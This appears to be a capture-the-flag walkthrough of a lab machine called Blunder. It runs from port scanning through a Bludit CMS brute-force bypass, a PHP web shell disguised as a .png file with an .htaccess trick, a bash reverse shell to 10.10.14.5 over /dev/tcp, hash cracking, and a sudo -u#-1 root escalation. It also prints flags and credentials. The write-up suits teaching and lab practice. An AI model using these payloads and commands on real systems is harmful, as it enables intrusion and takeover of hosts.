Blunder

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.191 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Thu Jun 23 20:11:07 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.076s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE  SERVICE
21/tcp closed ftp
80/tcp open   http

# Nmap done at Thu Jun 23 20:11:33 2022 -- 1 IP address (1 host up) scanned in 26.59 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p21,80 10.10.10.191 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Thu Jun 23 20:10:35 2022 as: nmap -sCV -p21,80 -oN targeted 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.054s latency).

PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-title: Blunder | A blunder of interesting facts
|_http-server-header: Apache/2.4.41 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jun 23 20:10:58 2022 -- 1 IP address (1 host up) scanned in 23.53 seconds

Let's take a look at the website.

Not much going on. Now, let's try to enumerate subdirectories with gobuster.

gobuster dir -u http://10.10.10.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x php,txt

• dir enumerates directories or files.

• -u the target URL.

• -w path to the wordlist.

• -t number of current threads, in this case 200 threads.

• -x add the following extensions.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.191
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/06/23 23:40:28 Starting gobuster in directory enumeration mode
===============================================================
/about                (Status: 200) [Size: 3281]
/0                    (Status: 200) [Size: 7562]
/admin                (Status: 301) [Size: 0] [--> http://10.10.10.191/admin/]
/install.php          (Status: 200) [Size: 30]                                
/robots.txt           (Status: 200) [Size: 22]                                
/usb                  (Status: 200) [Size: 3960]                              
/todo.txt             (Status: 200) [Size: 118]                               
/LICENSE              (Status: 200) [Size: 1083]                              
Progress: 15450 / 262995 (5.87%)
                                                                              
===============================================================
2022/06/23 23:41:48 Finished
===============================================================

If we take a look at the todo.txt file, we'll see some potential user called fergus.

On the other hand, if we take a look at the /admin directory, we'll see an admin login panel for the Bludit CMS.

Exploitation

Let's try to look for common exploit of Bludit with searchsploit.

searchsploit bludit

----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Bludit - Directory Traversal Image File Upload (Metasploit)                        | php/remote/47699.rb
Bludit 3.13.1 - 'username' Cross Site Scripting (XSS)                              | php/webapps/50529.txt
Bludit 3.9.12 - Directory Traversal                                                | php/webapps/48568.py
Bludit 3.9.2 - Auth Bruteforce Bypass                                              | php/webapps/48942.py
Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)                       | php/webapps/49037.rb
Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass                         | php/webapps/48746.rb
Bludit 3.9.2 - Directory Traversal                                                 | multiple/webapps/48701.txt
bludit Pages Editor 3.0.0 - Arbitrary File Upload                                  | php/webapps/46060.txt
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is one called Auth Bruteforce Bypass which seems to allow us to brute force the login panel. Let's move it to the current directory.

searchsploit -m php/webapps/48942.py

The script needs a file of users, and a file of passwords. First, let's create a file called user with the fergus user in it.

echo "fergus" > user

Now, we need a file with passwords. We could use the cewl tool, which will create a dictionary of words based on the website.

cewl -w passwords http://10.10.10.191 --with-numbers

• -w write the output to a file.

• --with-numbers accept words with numbers.

Finally, we can run the python exploit indicating the URL of the login panel, the user file, and the passwords file.

python 48942.py -l http://10.10.10.191/admin/login.php -u user -p passwords

• -l URL of the login panel.

• -u file with users.

• -p file with passwords.

[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX

[*] SUCCESS !!
[+] Use Credential -> fergus:RolandDeschain

And we get some valid credentials, let's try them.

And we get in.

If we take a look at the common exploits again, we'll see that there is one called Directory Traversal, let's move it to the current directory, and rename it with the .py extension.

searchsploit -m multiple/webapps/48701.txt

mv 48701.txt exploit.py

Before executing it, we'll have to modify it a bit. We'll have to change the url, username and password variables to the valid credentials.

url = 'http://10.10.10.191'  # CHANGE ME
username = 'fergus'  # CHANGE ME
password = 'RolandDeschain'  # CHANGE ME

Now, we'll have to create a file called evil.png with some PHP code that will allow us to execute commands on the victim machine.

nano evil.png

<?php echo "<pre>" . system($_GET['cmd']) . "</pre>"; ?>

Then, let's execute the following commands that will create the .htaccess file with some configuration that will allow us to execute the evil.png as a PHP file.

echo "RewriteEngine off" > .htaccess

echo "AddType application/x-httpd-php .png" >> .htaccess

Finally, we could execute the exploit.

python exploit.py

cookie: 1k28n37kgfhgtccnafspl3p282
csrf_token: 1ec69efb5a8c5be29855fb70a11b15fdf1d9d6e1
Uploading payload: evil.png
Uploading payload: .htaccess

If now we access the following URL, we'll be able to execute commands on the victim machine.

http://10.10.10.191/bl-content/tmp/temp/evil.png?cmd=whoami

Time to get a shell. First, let's set a netcat listener on port 4444.

nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

If now we access the following URL, we'll get a reverse shell as the www-data user.

http://10.10.10.191/bl-content/tmp/temp/evil.png?cmd=bash -c "bash -i >%26 /dev/tcp/10.10.14.5/4444 0>%261"

listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.191] 43748
bash: cannot set terminal process group (1272): Inappropriate ioctl for device
bash: no job control in this shell
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp/temp$ whoami
whoami
www-data

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

Let's enumerate the system users.

grep sh /etc/passwd

root:x:0:0:root:/root:/bin/bash
shaun:x:1000:1000:blunder,,,:/home/shaun:/bin/bash
hugo:x:1001:1001:Hugo,1337,07,08,09:/home/hugo:/bin/bash
temp:x:1002:1002:,,,:/home/temp:/bin/bash

At this point, I started enumerating the machine, and I found the /var/www/bludit-3.10.0a/bl-content/databases/users.php config file with a password hash for the hugo user.

cat /var/www/bludit-3.10.0a/bl-content/databases/users.php

<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

Let's make use of rainbow tables and try to find out the password.

CrackStation uses massive pre-computed lookup tables to crack password hashes. These tables store a mapping between the hash of a password, and the correct password for that hash.

https://crackstation.net/

Now we could become the hugo user, and grab the user flag.

su hugo

Password: Password120
hugo@blunder:~$ cat /home/hugo/user.txt 
5720c9d1fce452b0d80d70793e9b4628

If we list the sudo privileges of the hugo user, we'll see that we can get a shell as any user, except the root user.

sudo -l

Password: Password120
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

But, if we check the sudo version, we'll see that it is a vulnerable version.

sudo --version

Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1

As this CVE explains, we could bypass this rule. All we have to do is execute the following command, get a shell as root, and reap the harvest and take the root flag.

sudo -u#-1 /bin/bash

root@blunder:/home/hugo# whoami
root
root@blunder:/home/hugo# id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/home/hugo# cat /root/root.txt 
2504f40023c2746b537a436087d1b622